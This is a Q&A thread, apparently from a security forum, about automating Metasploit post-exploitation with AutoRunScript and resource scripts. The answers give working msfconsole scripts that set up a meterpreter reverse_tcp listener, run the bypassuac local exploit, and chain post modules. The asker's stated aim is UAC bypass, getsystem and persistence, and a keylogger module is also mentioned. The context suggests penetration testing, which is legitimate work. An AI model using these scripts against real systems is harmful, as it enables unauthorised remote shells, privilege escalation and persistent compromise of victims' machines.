5

Is there a way to run exploits that require parameters, such as the one in the title, using AutoRunScript?

I was able to use AutoRunScript to execute some post commands perfectly, such as keylog_recorder or checkvm.

But when I added this to my script:

use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit

I got this:

[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.

Clearly I'm missing something here. How can I do this? My objective is to be able to bypass UAC, use getsystem and then get a foothold using the persistence options.

As a side note, I understand that using "set SESSION 1" will only work for the first computer in the engagement. I would need to somehow use a variable to refer to the session that is currently initiating.

Does anyone have any solutions for this?

schroeder
user342872

2 Answers

3

You need to give the options directly where you are setting the AutoRunScript.

msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
void_in
1

You cannot execute those commands in an AutoRunScript because they are commands to the msfconsole, while the AutoRunScript works only in the context of meterpreter. So, you'd need something like this:

#msfconsole.rc
   #Configure your listener and payload
   use multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set AutoRunScript auto.rc
   exploit -j
   use exploit/windows/local/bypassuac
   set TARGET 0
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set DisablePayloadHandler true
   set SESSION 1
   set TECHNIQUE EXE
   set ExitOnSession false
   #here you can also set another AutoRunScript for your new payload
   exploit

And on the auto.rc you can put things like:

#auto.rc

sysinfo
checkvm

And any other meterpreter command or post module.

w0lf